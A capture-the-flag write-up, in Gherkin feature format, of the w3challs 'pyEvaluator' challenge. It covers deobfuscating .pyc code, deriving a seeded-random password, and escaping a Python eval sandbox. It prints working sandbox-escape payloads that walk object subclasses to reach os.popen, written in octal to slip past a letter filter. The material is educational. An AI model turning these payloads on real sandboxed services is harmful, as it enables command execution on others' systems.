## Version 2.0
## language: en

Feature:
  Site:
    w3challs
  Category:
    Misc
  User:
    mr_once
  Goal:
    Get the flag

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
    | Python          | 3.8.5       |
    | Netcat          | 0.7.1       |
  Machine information:
    Given I am accessing the challenge
    """
    nc pyevaluator.hax.w3challs.com 42007
    """
    And the description of the challenge is
    """
    The pyEvaluator authors implemented several classical techniques to counter
    reverse engineering (compilation of python sources to .pyc files, source
    code obfuscation...), and also to prevent the exploitation of
    vulnerabilities. But that's not an issue for you, right?

    The application is launched with xinetd and is available in TCP at the
    address pyevaluator.hax.w3challs.com:42007.

    Your goal is to find and read the flag.
    You'll have to find out how to spawn a shell.

    Challenge files (https://w3challs.com/media/challenges/pyEvaluator-c5e06099
    9997cf42a31869daf08e299579ae510252ad69acda99c332f96c1caa.tar.bz2)
    """

  Scenario: Success:Decompile the .pyc files
    Given I have two ".pyc" files
    When I use this page to decompile them
    """
    https://www.toolnb.com/tools-lang-en/pyc.html
    """
    Then I get the source code
    But it is obfuscated [evidence](decompiled.png)

  Scenario: Success:Get a log-in credentials
    Given I start deobfuscating the code from the bottom up
    Then I can see this function decrypts all the strings
    """
    def OO0o(Oo0Ooo):
      Oo0Ooo = base64.b64decode(Oo0Ooo.encode()).decode()
      O0O0OO0O0O0 = 66
      iiiii = ''
      for ooo0OO in Oo0Ooo:
        iiiii += chr(ord(ooo0OO) ^ O0O0OO0O0O0)
        O0O0OO0O0O0 = (O0O0OO0O0O0 + 1) % 255

      return iiiii
    """
    Then I use that same function to start deobfuscating the code
    And I see the code starts by calling the function "oO00O00o0OOO0"
    """
    if __name__ == OO0o('HRwpJC8pFxY='):
      sys.__getattribute__(OO0o('JzstMQ=='))(oO00O00o0OOO0())
    """
    And deobfuscated is
    """
    if __name__ == "__main__":
      sys.exit(oO00O00o0OOO0())
    """
    When I deobfuscate "oO00O00o0OOO0" then I get
    """
    def oO00O00o0OOO0():
      for banner_line in banner.splitlines():
          print('          ' + banner_line)

      oO0 = input('                                   Login : ')
      DECODEOooODECODEo = input('                                Password : ')
      print()

      if not oO(oO0, DECODEOooODECODEo):
          print(o0oOoO00o('[-] Authentication failed'))
          return 1
      else:
      ...
    """
    Then I notice the function that handles the authentication is "oO"
    When I deobfuscate "oO" I find
    """
    def oO(oO0, DECODEOooODECODEo):
      iiIIiIiIi = string.ascii_letters + string.digits
      i1I11 = len(iiIIiIiIi)
      if len(oO0) < 3 or len(DECODEOooODECODEo) != 16:
          return False
      try:
          o0DECODE00oo = int(oO0, 36)
          random.seed(o0DECODE00oo)
          for oDECODEO in DECODEOooODECODEo:
              generated = random.randint(0, i1I11)
              if oDECODEO != iiIIiIiIi[generated]:
                  return False
      except:
          return False
      return True
    """
    Then I notice the password is generated using the username as a seed
    And I change that function to get a valid credential
    """
    def oO(oO0, DECODEOooODECODEo):
      ...
      if len(oO0) < 3:
          return False
      try:
          o0DECODE00oo = int(oO0, 36)
          random.seed(o0DECODE00oo)
          for oDECODEO in range(16):
              generated = random.randint(0, i1I11)
              print(iiIIiIiIi[generated], end="")
          print()
      ...
    """
    When I run the script and enter the username "0000"
    Then I get that the password is "2yW4Acq9GFz6Y1t9"
    And now I can log in [evidence](logged.png)

  Scenario: Success:
    Given I keep deobfuscating the code
    """
    ...
    while 1:
      try:
        banner_line = input(O0o(oO0, "Pydecode"))
      except EOFError:
        print('Goodbye.')
        break

      banner_line = banner_line.replace(' ', '')
      if banner_line == '':
        pass
      else:
        if '_' in banner_line:
          print(o0oOoO00o("[-] Hacking attempt detected mofo."))
          return 1
        if any([oDECODEO.isalpha() for oDECODEO in banner_line]):
          print(o0oOoO00o('[-] Forbidden characters.'))
          continue
        print(Iget_builtinI111(banner_line))
    ...
    """
    Then I find that I can't use neither "_" nor any letters
    And the input is passed to "Iget_builtinI111"
    And "Iget_builtinI111" pass the input to "iiget_builtin1"
    When I deobfuscate the code of "iiget_builtin1"
    """
    def iiget_builtin1(OOooO, OOoO00o):
      try:
        iiiii = eval(OOooO, {"__builtins__": None}, {})
        if isinstance(iiiii, str):
          iiiii = eval(iiiii, {"__builtins__": None}, {})
        OOoO00o.put(IIget_builtin1I1('[+] Result:') + str(iiiii))
      except Exception as e:
        print(e)
        OOoO00o.put(o0oOoO00o('[-] Invalid mathematical expression'))

      OOoO00o.close()
    """
    Then I can see the input is passed to "eval"
    But I can't use any builtin function
    And I realize this is the function I need to exploit

  Scenario: Success:Finding how to exploit eval with the given restrictions
    Given That now I know I have to exploit python's function "eval"
    And I can't use any letter or "_"
    Then I search for ways to bypass the function
    When I go to
    """
    https://book.hacktricks.xyz/misc/basic-python/bypass-python-sandboxes\
    #executing-python-code
    """
    Then I find that I can use octal which only needs numbers and "\\"
    When I go to
    """
    https://book.hacktricks.xyz/misc/basic-python/bypass-python-sandboxes\
    #no-builtins
    """
    Then I find several ways to bypass the no builtins restriction

  Scenario: Fail:Wrong payloads
    Given that now I know how to exploit the function
    Then I try the payloads given in the page
    """
    ().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__\
    ['__import__']('os').system('ls')
    ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__\
    ("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls')
    ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals\
    .values()[13]["eval"]("__import__('os').system('ls')")
    """
    But they don't work since the index may vary from system to system

  Scenario: Success:Right payload
    Given the payloads based on knowing the index of the function don't work
    Then I try to use the payload
    """
    __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x\
    .__name__ == 'catch_warnings'][0]()._module.__builtins__)
    __builtins__["__import__"]('os').system('ls')
    """
    But I modify it to meet my needs
    """
    ([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ ==\
     'catch_warnings'][0]()._module.__builtins__)['__import__']('os')\
     .popen('id').read()
    """
    When I inject the payload in octal into the application
    Then I can see it works [evidence](exploited.png)

  Scenario: Success:Find the flag
    Given that now I can bypass the filters
    Then I try listing the contents of the directory
    """
    [+] Result: total 40
    drwxr-xr-x 1 root root 4096 Nov 18  2019 .
    drwxr-xr-x 1 root root 4096 Nov 18  2019 ..
    -rw-r--r-- 1 root root  220 Apr  4  2018 .bash_logout
    ...
    -r-xr-xr-x 1 root root 5855 Nov 18  2019 obfuscated.py
    -r-xr-xr-x 1 root root 2479 Nov 18  2019 pyevaluator.py
    drwxr-xr-x 1 root root 4096 Nov 18  2019 the_flag
    """
    And I can see a directory called "the_flag"
    When I follow the contents of that directory
    Then I find the flag is in "the_flag/is/in/this/directory/flag"
    And I solve the challenge [evidence](flag.png)
